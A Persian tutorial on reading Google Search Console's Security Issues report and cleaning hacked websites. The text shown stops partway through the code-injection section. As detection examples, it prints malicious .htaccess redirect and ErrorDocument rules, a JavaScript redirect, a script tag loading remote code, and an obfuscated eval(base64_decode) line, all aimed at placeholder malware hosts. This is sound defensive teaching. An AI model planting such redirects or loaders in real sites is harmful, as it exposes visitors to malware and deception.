در ادامه آموزش های سرچ کنسول در سایت میزفا خدمت شما عزیزان هستیم. در این قسمت قرار است که به طور عمیق به آموزش رفع مشکلات امنیتی و بررسی گزارش Security Issues سرچ کنسول گوگل بپردازیم.
مشکلات امنیتی وبسایت به دلایل مختلفی اتفاق میافتند. برای نمونه عدم به روزرسانی افزونههای سایت یا استفاده نکردن از هاست مناسب بستری را فراهم میکند تا هکرها با سوءاستفاده از نقاط آسیب پذیر به وبسایت نفوذ کنند و به واسطه مهندسی اجتماعی یا جایگذاری کد و نرمافزارهای مخرب به اهداف شوم خود برسند. این قبیل مشکلات میتوانند نتیجه مدتها تمرکز روی سئو سایت یا جلب اعتماد بازدیدکنندگان را بر باد دهد!
انواعی از این مشکلات امنیتی توسط گوگل شناسایی شده و در قالب خطا یا هشدارهای امنیتی در بخش گزارش Security Issues سرچ کنسول نمایش داده میشود. در ادامه به انواع مشکلات امنیتی سایت میپردازیم و یکسری راه حل خوب برای رفع مشکل امنیتی در سرچ کنسول ارائه خواهیم داد. همچنین اگر سایت وردپرسی دارید بهتر است با نصب بهترین افزونه امنیت وردپرس نقاط آسیب پذیر سایت را شناسایی کنید.
سرفصلهای پست
- 1 بررسی انواع مشکلات امنیتی
- 2 بررسی گزارش Security Issues سرچ کنسول
- 3 آموزش رفع مشکلات امنیتی سرچ کنسول
- 3.1 1- مشکل امنیتی Deceptive pages
- 3.2 2- مشکل امنیتی Deceptive embedded resources
- 3.3 3- مشکل امنیتی Harmful downloads
- 3.4 4- مشکل امنیتی Links to harmful downloads
- 3.5 5- مشکل امنیتی Unclear mobile billing
- 3.6 6- مشکل امنیتی Malware
- 3.7 7- مشکل امنیتی Hacked: Code injection
- 3.8 8- مشکل امنیتی Hacked: Content injection
- 3.9 9- مشکل امنیتی Hacked: URL injection
- 3.10 10- هشدار امنیتی Uncommon downloads
- 3.11 مرحله نهایی: درخواست تجدید نظر یا Request Review
- 4 جمع بندی
بررسی انواع مشکلات امنیتی
شاید یک تبلیغ مخرب در جایی از سایت که انتظارش را ندارید درحال فیشینگ کاربران باشد و از این طریق آنها را نسبت به افشای اطلاعات محرمانه فریب میدهد! هکرها ممکن است با افزودن صفحات پنهان به همراه لینک و متون پنهانی در حال سوء استفاده باشند. این محتوا توسط موتور جستجو مشاهده میشود اما از دید شما و سایر بازدیدکنندگان دور است! ممکن است افرادی به سایت نفوذ کرده باشند و با افزودن کدهای مخرب ریدایرکت ناخواسته ایجاد کنند و بازدیدکنندگان را به صفحات خطرناک هدایت کنند.
اصلا مشکلات امنیتی چه هستند و به چه روشهایی انجام میشوند؟ قبل از آموزش گزارش Security Issues سرچ کنسول خیلی عالی میشود اگر بتوانید مشکلات امنیتی را از هم تفکیک کنید و نوع مشکل امنیتی که دچار آن شدهاید را بشناسید. گوگل در مقالات خود انواع Security Issues یا مشکلات امنیتی را به سه دسته تقسیم کرده است؛ در ادامه به طور کلی این 3 مورد را به همراه چند مثال ساده توضیح میدهیم.
1- Hacked content یا محتوای هک شده
محتوای هک شده یا Hacked content درواقع محتوایی است که بدون اجازه شما در سایت جاسازی شده و بازدیدکنندگان را به سمت اهداف موردنظر هکرها هدایت میکند. در این مشکل امنیتی نقاط آسیپ پذیر سایت هدف قرار میگیرند و نفوذ انجام میشود.
دلیل اهمیت گوگل به این مقوله این است که وجود یک محتوای هک شده موجب میشود تا کاربران از نتایج جستجو گوگل راضی نباشند؛ به عنوان مثال کاربری را درنظر بگیرید که از طریق نتایج جستجو گوگل روی لینکی کلیک میکند که در مورد “دانلود آهنگ” است، اما صفحهای که باز میشود چه از لحاظ نام سایت و چه از لحاظ موضوعی بیربط با آنچه است که انتخاب کرده بود، در نهایت همین موضوع عاملی میشود تا از محبوبیت گوگل بین کاربران کاسته شود.
انواع Hacked content
- Injected content: محتوای تزریق شده یا Injected content یعنی محتوای مخربی که توسط هکر به صفحه ای از سایت یا iframe اضافه میشود. این Injected content معمولا در قالب یک قطعه کد جاوا اسکریپت با اهداف مخربانه است.
- Added content: همانطور که از نام Added content پیداست یعنی محتوای اصافه شده. در این مشکل امنیتی هکرها از نقض های امنیتی استفاده کرده و یکسری صفحات جدید که شامل محتوای مخرب یا اسپم است را به سایت اضافه میکنند. هدف چیست؟ تخریب موتورهای جستجو و کاهش کیفیت عمکلرد سایت! این صفحات مخرب ممکن است به بازدیدکنندگان سایت آسیب بزنند یا عملکرد سایت را در موتورهای جستجو کاهش بدهند و در عین حال بی سر و صدا و بدون آنکه شما متوجه شوید به فعالیت ادامه دهند.
- Hidden content: خب Security Issues میتواند از موارد بالا هم ترسناکتر شود و آن هم محتوای مخرب اما پنهان است!? این محتوای پنهان بدون آنکه روح شما و بازدیدکنندگان خبر داشته باشد در سایتتان جا خوش کرده و با یکسری لینک و متون پنهانی سعی در تخریب سایت و یا دریافت بک لینک دارد. نکته اینجاست که چنین محتوای پنهانی توسط موتورهای جستجو خزش می شوند اما از دید شما خارجند! محتوای پنهان توسط هکرها و با استفاده از HTML یا CSS به صفحات افزوده میشوند.
- Redirects: محتوای هک شده حتی می تواند یک کد ناخواسته در سایت باشد که برخی کاربران را به صفحات خطرناک یا اسپم هدایت میکند. برای مثال فرض کنید که کاربر پس از کلیک روی صفحهای از سایت شما که در نتایج موتور جستجو ظاهر شده به آدرسی مشکوک ریدایرکت شود! البته این ریدایرکت مخرب می تواند طوری تعیین شود که اگر کاربر همان آدرس را به طور مستقیم در مرورگر وارد کرد ریدایرکت نشود بلکه ریدایرکت تنها از سمت ترافیک ورودی از موتور جستجو انجام گیرد.
2-بدافزار و نرم افزارهای ناخواسته
تابحال در گزارش مشکلات امنیتی سرچ کنسول با اخطار Harmful downloads و Malware مواجه شدهاید؟ یکی از هشدارهایی که ممکن است در گزارش Security Issues سرچ کنسول مشاهده کنید مشکلات امنیتی مرتبط با بدافزارها (malware) و نرم افزارهای ناخواسته است. چنین مشکلات امنیتی میتوانند طوری طراحی شوند که تنها با قرارگیری در هاست باعث اختلال عمکلرد سایت شود. این بدافزارها نه تنها برای سایت یک تهدید جدی محسوب میشوند بلکه برای بازدیدکنندگان عادی سایت نیز مشکل ساز خواهند شد.
این بدافزار و نرم افزارها به منظور آسیب به سایت یا آسیب به کاربر طراحی شدهاند. درواقع برخلاف مورد قبلی که یکسری محتوا در قالب کد و متن به سایت افزوده میشد، این مشکل امنیتی به نرم افزار و بدافزار اشاره دارد. به تعاریف زیر دقت کنید:
- malware: تعریف کلی بدافزار یا malware اپلیکیشن یا نرم افزاری است که به طور اختصاصی برای آسیب به کامپیوتر، موبایل، نرم افزار اجرا کننده آن و حتی کاربران طراحی شدهاست. البته در این مقاله آموزش Security Issues سرچ کنسول منظورمان از malware یک بدافزار تحت وب است که بدون آگاهی کاربر اجرا میشود. اخطار Harmful downloads سرچ کنسول نیز همان بدافزار یا نرم افزار مخرب و قابل دانلود میباشد که صرفا برای دانلود توسط کاربر طراحی شده است.
- unwanted software: نرم افزارهای ناخواسته یک فایل قابل اجرا (executable) هستند که به منظور فریب یا تأثیر منفی روی فرآیند کار کردن کاربر در مرورگر طراحی میشوند. بخاطر یک نرم افزار ناخواسته که در هاست سایت قرار گرفته ممکن است اطلاعات محرمانه شما جمعآوری شوند یا تنظیمات مرورگر بدون خواسته شما تغییر کنند.
3- Social engineering
مشکلات امنیتی سرچ کنسول همیشه از نوع بدافزار یا محتوای هک شده نیست. فریب کاربر از طریق مهندسی اجتماعی از روش های نه چندان پیچیده محسوب میشود. احتمالا با فیشینگ آشنا باشید و یا احداقل اسمی از آن را شنیده باشید، درحقیقت فیشینگ نوعی Social engineering یا مهندسی اجتماعی است.
حملات مهندسی اجتماعی یعنی وقتی که کاربر وب برای اقدامی خطرناک در فضای آنلاین گول میخورد. شاید با خودتان بگویید که من چنین کاری را در سایت خودم انجام نمیدهم، اما اگر شما انجام نمیدهید، آیا شخصی که به سایت شما نفوذ کرده نمیتواند انجام دهد؟
بد نیست که با انواع مهندسی اجتماعی در سطح وب اتفاق میافتد آشنا شوید:
- فیشینگ: فیشنگ به معنای فریب کاربر برای افشای اطلاعات شخصی است. این حملهی امنیتی معمولا در محیطی که به نظر امن میرسد اتفاق میافتد، مثل صفحهای تقلبی که شبیه به درگاه بانک است اما درواقع به منظور جمعآوری اطلاعات بانکی کاربران طراحی شدهاست.
- محتوای فریب دهنده: محتوای فریب دهنده یا Deceptive content درواقع شکلی از محتوا است که کاربر را فریب میدهد تا دست به اقدامی بزند که فقط آن را در محیط یا برای شخص مورداعتماد انجام میداد. برای مثال محتوایی را فرض کنید که تبلیغی در آن تعبیه شده که اعلام میکند نرم افزار شما نیاز به آپدیت دارد و بلافاصله پس از کلیک کاربر بر روی تبلیغ فایلی دانلود میشود که در حقیقت یک بدافزار است.
- خدمات شخص ثالث غیرشفاف: در برخی مواقع ممکن است نیمی از وظایف نگهداری سایت یا ارائه خدمات توسط شخص دیگری که دارای موجودیت مستقلی از سایت شما است انجام گیرد. برای نمونه فرض کنید یک سایت خیریه راهاندازی کردهاید و بنابه دلایلی بخش جمع آوری خیرات مردم را به سایت دیگری (شخص ثالث) واگذار میکنید. در چنین حالتی اگر ارتباط بین سایت خودتان و سایت شخص ثالث بدون شفاف سازی صورت گیرد باید منتظر باشید که گوگل برچسب “مهندسی اجتماعی” را به سایت شما بزند. به چنین مشکل امنیتی Insufficiently labeled third-party services یا خدمات شخص ثالث غیرشفاف میگویند.
بررسی گزارش Security Issues سرچ کنسول
چنانچه سایت شما درگیر یکسری مشکلات امنیتی شده باشد احتمالا با لیستی از اعلانات امنیتی روبرو خواهید شد. این اعلانات در بخش Security & Manual Actions و قسمت Security Issues قابل بررسی هستند. گزارش Security Issues در گوگل سرچ کنسول شامل یکسری اعلانات امنیتی است که نوع مشکل امنیتی، توضیحات و مثالی از آدرسهای تحت تأثیر قرار گرفته را اعلام میکند.
شناسایی مشکلات امنیتی با Google Safe Browsing
جالب است بدانید که هر روز هفته سرویس Google Safe Browsing هزاران سایت ناامن را کشف میکند. اما شاید بپرسید این سرویس چیست؟
سرویس Google Safe Browsing به طور اختصاصی توسط تیم امنیتی گوگل به منظور شناسایی وبسایت های ناامن طراحی شده است. Google Safe Browsing پس از شناسایی یک سایت غیرامن بلافاصله وب مستر و بازدیدکننده را از وجود مشکل امنیتی باخبر می کند.
به عبارتی همین اعلانات امنیتی گزارش Security Issues سرچ کنسول توسط سرویس Google Safe Browsing شناسایی شده و این گزارشات به همراه جزئیات دقیق به سرچ کنسول ارائه میشود. البته شرکت گوگل در مورد نحوه عمکلرد Google Safe Browsing توضیحات دقیقی ارائه ندادهاست اما این سرویس با اسکن و استفاده از ماشین های مجازی سایتهای در معرض خطر را شناسایی و آنالیز میکند.
عواقب جدی نگرفتن Security Issues سرچ کنسول
- درمواقعی هنگام ورود به سایت یک هشدار امنیتی به بازدیدکنندگان نمایش داده شود و وجه سایت تحت تأثیر قرار میگیرد.
- اطلاعات محرمانهای که استفاده میکنید فاش شود و مورد سوء استفاده قرار بگیرد.
- ممکن است به زودی سایت شما از دسترس خارج شود.
- عملکرد سایت افت پیدا کند (بررسی گزارش core web vitals سرچ کنسول مرتبط با کیفیت عملکرد سایت است)
- به دلیل مشکلات امنیتی رتبه سایت به طور چشمگیری کاهش یابد.
- کاربران سایت در دام خطرات امنیتی بیفتند (مثل دانلود بدافزار، ریدایرکت به آدرسی خطرناک و …)
- کاربران سایت اعتمادی که به شما داشتهاند را از دست بدهند.
کدام صفحات دچار مشکلات امنیتی شدهاند؟
راستش را بخواهید گزارش Security Issues مثل گزارش Mobile Usability سرچ کنسول نیست که تمام URLهای تحت تأثیر را به شما گزارش دهد. در حقیقت Sample URLs که در توضیحات در اعلان امنیتی میبینید تنها یک مثال از چندین صفحه تحت تأثیر قرار گرفته است.
به گفته گوگل بنابه دلایلی امکان مشخص کردن تمام آدرسهایی که دچار یک مشکل امنیتی شدهاند وجود ندارد! به هرحال اگر دیدید که در جزئیات فلان اعلان امنیتی خبری از Sample URLs نیست دلیل براین نیست که به امان خدا رهایش کنید!
آموزش رفع مشکلات امنیتی سرچ کنسول
در این بخش لیستی از خطاهای رایج و هشدارهای امنیتی سرچ کنسول و نحوه رفع آن را مشاهده خواهید کرد. مدنظر داشته باشید که به معنی خطا و به معنی هشدار است.
نکته خیلی مهم: هرگز URL صفحات آلوده را در مرورگر خود باز نکنید. زیرا خودتان هم ممکن است قربانی شوید. حتی هکر ممکن است با وصول به تکنیکهای cloaking* محتوای اسپم را از دید بازدیدکننده پنهان کند. بنابراین ترجیحاً از ابزار url inspection سرچ کنسول برای بازدید از صفحه و بررسی کد و منابع آن استفاده کنید. راه حل دیگر استفاده از cURL و Wget برای بررسی URL های موردنظر از منابع مختلف است. برای مثال قطعه کد زیر در از منبع گوگل صفحه http://www.example.com/page.html درخواست میدهد.
$curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html
*Cloaking: کلوکینگ یعنی نمایش محتوای متفاوت به کاربران و روبات موتور جستجو. برای نمونه تعبیه لینکهایی در سایت که از دید بازدیدکننده پنهان است اما توسط موتورهای جستجو خزش میشوند.
1- مشکل امنیتی Deceptive pages
اگر در برخی از صفحات سایت محتوایی فریب دهنده وجود داشته باشد در پنل سرچ کنسول خطای Deceptive pages مشاهده خواهید کرد. در Deceptive pages از تکنیکهای مهندسی اجتماعی برای گول زدن کاربر استفاده میشود تا هکر به اهداف خود برسد. در چنین شرایطی سرویس Google Safe Browsing هشداری را به بازدیدکنندگان همان صفحات نمایش میدهد، اکنون تصور کنید این مقوله چقدر روی اعتماد کاربر و تجربه کاربری اثر منفی دارد.
جهت رفع خطای Deceptive Pages سرچ کنسول
مرحله اول: به آدرسی که برای نمونه درج شدهاست (sample URLs) این خطا مراجعه کنید و اقدام به شناسایی و رفع محتوای فریب دهنده کنید. به شما پیشنهاد میکنم بخش مهندسی اجتماعی این مقاله را مجدد مطالعه بفرمایید.
مرحله دوم: پس از رفع خطا برای درخواست تجدید نظر توسط گوگل روی Request Review کلیک کنید.
نکته: اگر به یقین رسیدید که سرویس گوگل اشتباه کردهاست و فیشینگ در صفحه موردنظر اتفاق نیافتادهاست این مورد را از اینجا به گوگل report کنید.
2- مشکل امنیتی Deceptive embedded resources
خطای Deceptive embedded resources سرچ کنسول یعنی در جایی از سایت منابعی به منظور فریب کاربر تعبیه شدهاند. این منابع میتواند اعم از تصویر، تبلیغات یا سایر بخشهای مرتبط با شخص ثالث باشد. فریب بازدیدکننده برای افشای اطلاعات محرمانه یا دانلود یک نرم افزاری ناخواسته مثالی از اهداف تعبیه چنین منابعی در سایت است.
نحوه رفع خطا Deceptive embedded resources سرچ کنسول
مرحله اول: جهت رفع خطای امنیتی Deceptive embedded resources سرچ کنسول به آدرسی که به عنوان نمونه ذکر شدهاست مراجعه کنید (Sample URLs) و از بابت نبود محتوایی فریب دهنده مطمئن شوید. برای مثال به بخشی از سایتتان که به تبلیغات سایر شبکه های تبلیغاتی اختصاص دادهاید توجه کنید؛ شاید هدف محتوای تبلیغاتی این شبکه در نسخه موبایل فریب بازدیدکننده است اما شما از همه جا بیخبر گمان میکردید که تبلیغ نمایش داده شده در دسکتاپ همانی است که در نسخه موبایل نشان داده میشود. پیشنهاد میکنم برای بررسی صفحات سایت در دو نسخه موبایل یا دسکتاپ از ابزار url inspection سرچ کنسول استفاده کنید.
مرحله دوم: درنهایت پس از شناسایی عامل فریب دهنده آن را حذف کنید. پس از رفع خطا باید برای بررسیهای دوباره گوگل درخواست جدید نظر را اط رطیق دکمه Request Review ثبت کنید.
3- مشکل امنیتی Harmful downloads
اگر بازدیدکنندگان سایت به هرطریقی مجبور یا دعوت به دانلود یک بدافزار و یا حتی نرم افزاری ناخواسته شوند در چنین شرایطی خطای Harmful downloads را در گزارشات امنیتی سرچ کنسول دریافت خواهید کرد. گوگل کروم برای محافظت از امنیت کاربران یک هشدار امنیتی به تک تک بازدیدکنندگان سایت نمایش خواهد داد.
جهت رفع مشکل امنیتی Harmful downloads سرچ کنسول
مرحله اول: اگر خودتان به عمد این فایلها را در سایت قرار دادهاید پس حتماً آن را حذف کنید اما نسبت به درخواست تجدیدنظر یا همان Request Review اقدام نکنید.
مرحله دوم: اگر خودتان از چنین مشکلی اطلاع نداشتهاید پس سایت شما دچار هک شدهاست. اول سایت هک شده خود را از چنگ هکر دربیاورید و پس از قطع دسترسی او نسبت به حذف فایلهای دانلودی مضر (Harmful downloads) اقدام کنید. گوگل در این مقاله نحوه پاکسازی یک سایت هک شده را آموزش دادهاست.
مرحله سوم: در مرحله بعدی پس از پاکسازی سایت میتوانید فایل بکاپی که از نسخه سالم سایت داشتهاید را جایگزین فایلهای آلوده کنید، اگر سایت وردپرسی دارید و هنوز گرفتار هک نشدهاید پس همین الآن با استفاده از یکی از بهترین افزونههای بکاپ وردپرس بکاپهای اتوماتیک و زمانبندی شده تنظیم کنید.
مرحله چهارم: همچنین اگر فکر میکنید که بخشی از سایت به نوعی بدافزار آلوده شدهاست از ابزار VirusTota کمک بگیرید.
مرحله پنجم: درنهایت پس از اطمینان از رفع مشکل درخواست تجدیدنظر را از طریق دکمه Request Review ثبت نمایید.
4- مشکل امنیتی Links to harmful downloads
این خطای امنیتی کمی شبیه به خطای امنیتی پیشنین یعنی Harmful downloads است با این تفاوت که لینکی به فایل دانلودی مضر در صفحات سایت شما قرار گرفته است، به عبارتی اگر کاربر روی لینکی کلیک کند به بدافزار یا نرم افزار موردنظر هکر هدایت میشود.
جهت رفع خطا Links to harmful downloads سرچ کنسول
مرحله اول: اگر خودتان از عمد چنین لینک هایی ایجاد کرده اید پس آن لینک را حذف کنید اما نسبت به درخواست تجدیدنظر یا همان Request Review اقدام ننمایید. اگر از چنین لینکهایی بیاطلاع بودهاید پس احتمالا هک شده اید و از یک طریقی در سایت شما نفوذ انجام شدهاست (مثل باگ امنیتی، قالب و افزونه غیراورجینال). در چنین شرایطی راه نفوذ هکر را ببندید.
مرحله دوم: پس از رفع مشکل هک سایت سراغ آدرسهای نمونه یا sample URLs که در کادر این خطای امنیتی ارائه شدهاست بروید. چنانچه خبری از لینک ناسالم نبود این احتمال وجود دارد که هکر برخی از این لینکها را از دید شما پنهان کرده باشد. پس برای بررسی بیشتر از ابزار url inspection سرچ کنسول برای مشاهده Crawled page کمک بگیرید. اگر بازهم به نتیجه نرسیدید با یک دسترسی دیگر یا حتی سیستم متفاوت بررسی کنید.
مرحله سوم: پس از شناسایی و حذف لینکهای مضر نوبت میرسد به پاکسازی سایت، این کار باید انجام شود تا مجدد هک نشوید؛ گوگل در این مقاله نحوه پاکسازی یک سایت هک شده را آموزش دادهاست. در این مرحله میتوانید فایل بکاپی که قبلا از نسخه سالم سایت تهیه کردهبودید را جایگزین صفحات آلوده فعلی کنید. (معرفی بهترین افزونههای بکاپ گیری برای سایت وردپرسی)
مرحله چهارم: پس از رفع این مشکل امنیتی کافیست در گزارش Security Issues سرچ کنسول گزینه Request Review را انتخاب نمایید.
5- مشکل امنیتی Unclear mobile billing
همانطور که میدانید امنیت کاربران برای گوگل اهمیت بالایی دارد و این امنیت شامل پرداختهای مالی و شفاف سازی نیز میشود. اگر در صورتحساب مشترکین اطلاعات دقیق و مرتبط با عوارض موبایل ارائه نشده باشد و به عبارتی کاربر نداند بابت چه خدمات و چه محصولاتی در حال پرداخت صورتحساب است در این صورت خطای امنیتی Unclear mobile billing شامل حال سایت خواهد شد.
همچنین اگر درقبال انجام خدماتی کارمزد دریافت میکنید حتما در این مورد توضیحاتی ارائه دهید تا کاربر بداند بابت چه خدمات و محصولاتی در حال پرداخت است.
در نتیجه برای رفع خطای Unclear mobile billing سرچ کنسول تنها کافیست ساختار مالیاتی دقیقی به کاربران ارائه دهید و مبهم عمل نکنید. درنهایت پس از رفع مشکل درخواست تجدید نظر را از طریق گزینه Request Review سرچ کنسول ثبت نمایید.
6- مشکل امنیتی Malware
همانطور که در بخش معرفی انواع مشکلات امنیتی سرچ کنسول همین صفحه توضیح داده شد malware یا بدافزار نوعی نرم افزار مخرب است که با هدف آسیب به کاربر، سیستم، موبایل یا هرنرمافزار دیگری که میزبان آن است طراحی شدهاست. این بدافزار میتواند حامل ویروس، تروجان، نرم افزارهای تبلیغاتی مزاحم و هرچیز مخرب دیگری باشد!
برای رفع مشکل امنیتی Malware سایت این نکته را عرض کنم که رفع چنین مشکلاتی نیاز به دانش نسبی از کد و کانفیگ وب سرور سایت دارد. در ادامه به رایجترین خطاهای امنیتی مرتبط با بدافزارهای وبسایت میپردازیم:
Server configuration malware (unwanted redirects)
درمواقعی هکر با یکسری تغییرات در فایل کانفیگ سرور و افزودن یکسری ریدایرکتهای ناخواسته موجب میشود تا کاربران سایت در دام خطر بیفتند. چرا فایل کانفیگ سرور چیست؟ درواقع این فایلها به مدیران سایت اجازه میدهد تا برای آدرس و دایرکتوریهای سایت ریدایرکت مشخص کنند، برای مثال در سرور آپاچی فایلهای کانفیگ سرور همان htaccess و httpd.con میباشد. جهت رفع این مشکل امنیتی مراحل زیر را دنبال کنید:
مرحله اول: آدرسهایی که به عنوان نمونه در گزارش این مشکل امنیتی ارائه شده است را به روش امن مورد بررسی قرار دهید. (مانند ابزار url inspection سرچ کنسول یا استفاده از cURL و Wget )
مرحله سوم: هدر صفحهای که از روش کانفیگ سرور مورد حمله قرار گرفتهاست احتمالا دارای چنین هدری است (این هدر را میتوانید در پاسخ HTTP صفحه بررسی کنید):
...
< HTTP/1.1 301 Moved Permanently
< Date: Mon, 24 May 2020 19:07:45 GMT
< Server: Apache
< Location: http://<malware-attack-site>/index.html
< Content-Length: 253
...
مرحله چهارم: با دسترسی شِل یا ترمینال به سرور لاگین شوید و فایلهای کانفیگ سرور را تا جای ممکن بررسی کنید. کاری که باید انجام دهید شناسایی دستور و ریدایرکت ناخواسه و مشکوک است. به عنوان مثال در فایل .htaccess احتمالا با چنین کد ریدایرکتی مواجه خواهید شد:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*
RewriteRule ^third-page.html($|/) http://<malware-site>/index.html [R=301]
در کد بالا بازدیدکندگانی که از گوگل به صفحه سایت مراجعه کردهاند با ریدایرکت 301 به آدرسی که هکر تعیین کردهاست (malware-site) هدایت میشوند.
به علاوه این امکان وجود دارد که هکر یکسری کرون جابزهای ناخواسته در پنل هاست ایجاد کردهباشد. این کرون جابزها میتوانند در لوکیشنهای مختلفی از جمله /etc/crontab یا /var/spool/cron جا خوش کرده باشند.
SQL injection
مشکل امنیتی SQL injection نوعی خطر امنیتی است که با دستکاری دیتابیس سایت به وجود میآید. برای مثال ممکن است هکر به هر رکورد دیتابیس کدهایی مخرب اضافه کند و اینگونه با هربار بارگیری صفحاتی که به اطلاعات دیتابیس نیاز دارند، کدهای مخرب نیز اجرا و به بازدیدکننده آسیب برسانند. حواستان به ورودی یا inputهای سایت باشد، چرا که همین ورودیها جادهای است مستقیم به دیتابیس سایت، در نتیجه برای پیشگیری از چنین مشکلاتی حتما کاراکترهای مجاز ورودیهای سایت را با رگولار اکسپرشن (Regex) محدود کنید.
جهت حل مشکل امنیتی SQL injection سرچ کنسول مراحل زیر را دنبال کنید:
مرحله اول: در خط فرمان (Command Line) یکسری کوئری روی آدرسهایی که تحت تأثیر بدافزار قرارگرفتهاند اجرا کنید و سپس پاسخ را از بابت کلماتی مثل “iframe” و “eval”بررسی نمایید. چنین کلماتی معمولا به حمله به SQL دلالت دارند.
مرحله دوم: سپس به سرور پایگاه داده لایگن شوید (مثل phpMyAdmin). اگر از Wget و cURL میتوانید با یکسری ورودیهای پایگاه داده به بخشهای آلوده دسترسی پیدا کنید. برای مثال اگر به این مشکل پی بردید که در تمامی صفحات سایت به یک نوع iframe مخرب وجود دارد، میتوانید با SQL کوئری زیر کد iframe را جستجو کنید.
SELECT * FROM blog_posts WHERE post_text LIKE '%>iframe%';
مرحله سوم: فایل لاگ و ارورهای دیتابیس را بررسی کنید و از بابت عدم وجود دستورات و لاگ های غیرنرمال مطمئن شوید.
مرحله چهارم: وقتی که آماده پاکسازی سایت شدید میتوانید تک تک رکوردهای دیتابیس آلوده را آپدیت کنید یا آخرین بکاپ سالمی که از دیتابیس تهیه کردهبودید را restore نمایید. (آموزش پاکسازی سایت از اینجا)
Malicious error templates
حتی صفحات 404 سایت و صفحاتی که در سایت وجود ندارند هم میتواند طعمه هکرها شود! در مورد خطای 404 بخوانید. در برخی مواقع هکرها تمپلیتی که برای نمایش پیغامهای خطا سایت استفاده میشود را پیکربندی کرده و از این طریق اقدام به توزیع بدافزار میکنند. جهت رفع این مشکل امنیتی Malicious error templates مراحل زیر را دنبال کنید:
مرحله اول: با ارسال درخواست http صفحاتی که درسایت وجود ندارند یا دارای خطا هستند را بررسی کنید. پس از ارسال درخواست http میتوانید وضعیت صفحه را در پاسخ (response) درخواست مشاهده کنید؛ ببینید این response یا پاسخ صفحه آیا از سایت دیگری آمده یا حاوی بدافزار است. (این ابزار به شما کمک میکند)
مرحله دوم: وارد وب سرور شوید و در فایلهای کانفیگ سرور به دنبال انواع دستورات مرتبط با خطای صفحه باشید. برای مثال در سرور آپاچی تمنپلیت خطا در فایل .htaccsess مشخص میشود. برای مثال قطعه کد زیر یک ورودی در فایل .htaccsess است که که صفحات با خطای 404 را از سایت مخرب بازیابی میکند.
ErrorDocument 404 http://<malware-site>/index.html
مرحله سوم: در نهایت باید سایت را پاکسازی کنید. در این مرحله میتوانید فایل بکاپ سالم را با فایلهای .htaccess آلوده جایگزین کنید. در غیراینصورت حتما دستورات ناخواستهای که در فایلهای .htaccess وجود دارند را حذف کنید.
مرحله چهارم:در نهایت وب سرور را رستارت کنید تا مطمئن شوید که تمام تغییرا اعمال شدهاست.
بارگیری منابع از سایت مخرب یا در معرض خطر
این مشکل امنیتی که با Loading resources from a compromised or malicious site نیز شناخته میشود بدین معنی است که سایت شما درحال دریافت محتوا (مثل لینک، کتابخانه و ..) از سایتی است که به داشتن محتوای مخرب شناخته شده است.
در صفحاتی که دارای این مشکل امنیتی میباشند در مرورگر کروم معمولا با چنین تصویری روبرو خواهید شد:
جهت رفع این مشکل امنیتی مراحل زیر را دنبال کنید:
مرحله اول: به تعدادی از sample URL یا آدرسهای نمونهای که در کادر این خطای امنیتی در سرچ کنسول ارائه شدهاست سر بزنید. چنانچه صفحه ای مشکل داشته باشد با تصویر بالا روبرو خواهید شد.
مرحله دوم: اگر در پیغام هشداری که از سمت مرورگر صادر میشود دقت کنید میتوانید دامین مجهول را مشاهده نمایید. حتما این URL را از کدهای سایت به طور کلی حذف کنید.
مرحله سوم: چنانچه فکر میکنید که این موضوع بدون اطلاع شما اتفاق افتاده (برای نمونه لینک سازیها به سایت مشکوک توسط شما انجام نشده) بنابراین موضوع جدی است و قطعا یک نفوذ صورت گرفتهاست. بهتر است در رابطه با ارائه راهکارهای پس از هک سایت این مقاله از سایت گوگل مطالعه کنید.
مرحله چهارم: پس از رفع ایرادات حتما در گزارش Security Issues سرچ کنسول از گوگل بخواهید که مجدد سایت شما را جهت اطمینان از نبود مشکلات امنیتی بررسی و تایید کند. بدین منظور گزینه Request Reveiw را انتخاب کنید.
7- مشکل امنیتی Hacked: Code injection
در بخش Hacked content همین صفحه تا حدودی به تزریق کد و محتوای مخرب به سایت آشنا شدید. برای نمونه هکر ممکن است با نوشتن کد (بدون استفاده از افزونه ریدایرکت) یکسری ریدایرکت های ناسالم و ناخواسته از سایت شما به مقصد دلخواه خودش ایجاد کند. این کدهای تعبیه شده در سایت یا ممکن است در خلال کدهای HTML سایت یا در فایلهایی مثل فایلهای PHP نوشته شده باشد. دوستان در بخش آموزش PHP آکادمی میزفا به زبان ساده زبان سمت سرور PHP را آموزش دادهایم.
آموزش رفع خطا Hacked: Code injection سرچ کنسول
مرحله اول: صفحاتی که تحت تأثیر این مشکل امنیتی بودهاند را از روشهای امن شناسایی کنید. معمولا در هربخش از مشکلات امنیتی گزارش Security Issues سرچ کنسول یکسری URL نمونه (Sample URL ) درج شدهاست.
مرحله دوم: هکرها از تکنیکهای مختلف برای قرار دادن کدهای خطرناک یا ریدایرکت بازدیدکنندگان سایت به مقاصد دلخواه خودشان استفاده میکنند، در زیر مهمترین تکنیکها را توضیح دادیم:
ریدایرکت هدر: در این روش فایل کانفیگ سرور توسط هکر تغییر پیدا میکند. مثال زیر در برای سرور آپاچی و در فایل .htaccess و همچنین httpd.conf درج شدهاست.
...
< HTTP/1.1 301 Moved Permanently
< Date: Mon, 24 May 2020 19:07:45 GMT
< Server: Apache
< Location: http://<malware-site>/index.html
< Content-Length: 253
ریدایرکت جاوااسکریپت: برای مثال اسکریپت زیر صفحه فعلی سایت را به مقصد موردنظر هکر هدایت میکند.
<script> if (document.referrer.match(/google\.com/)) { window.location("http://<malware-site>/");} <script>
بازگذاری جاوااسکریپت مخرب از سایت دیگر:
<script type='text/javascript' src='http://<malware-site>/js/x55.js'></script>
بهم ریختن یک کد مخرب برای جلوگیری از شناسایی شدن:
eval(base64_decode("d2luZG93LmxvY2F0aW9uPScvL2dvb2dsZS5jb20nOw=="));
این مثالی از یک کد بهم ریخته بود. شما می توانید برای یافتن سایر کدهای مشکوک عبارات “search”، “eval”، “base64_decode” و “unescape” را در سایت یا هنگام پاسخ (response) از وب سرور جستجو کنید.
مرحله سوم: در مرحله بعدی که آماده پاکسازی سایت شدید میتوانید فایلهای آسیب دیده را با آخرین نسخه بکاپ جایگزین کنید یا محتوای اسپم را خودتان حذف کنید. (راهنمای پاکسازی سایت از این لینک)
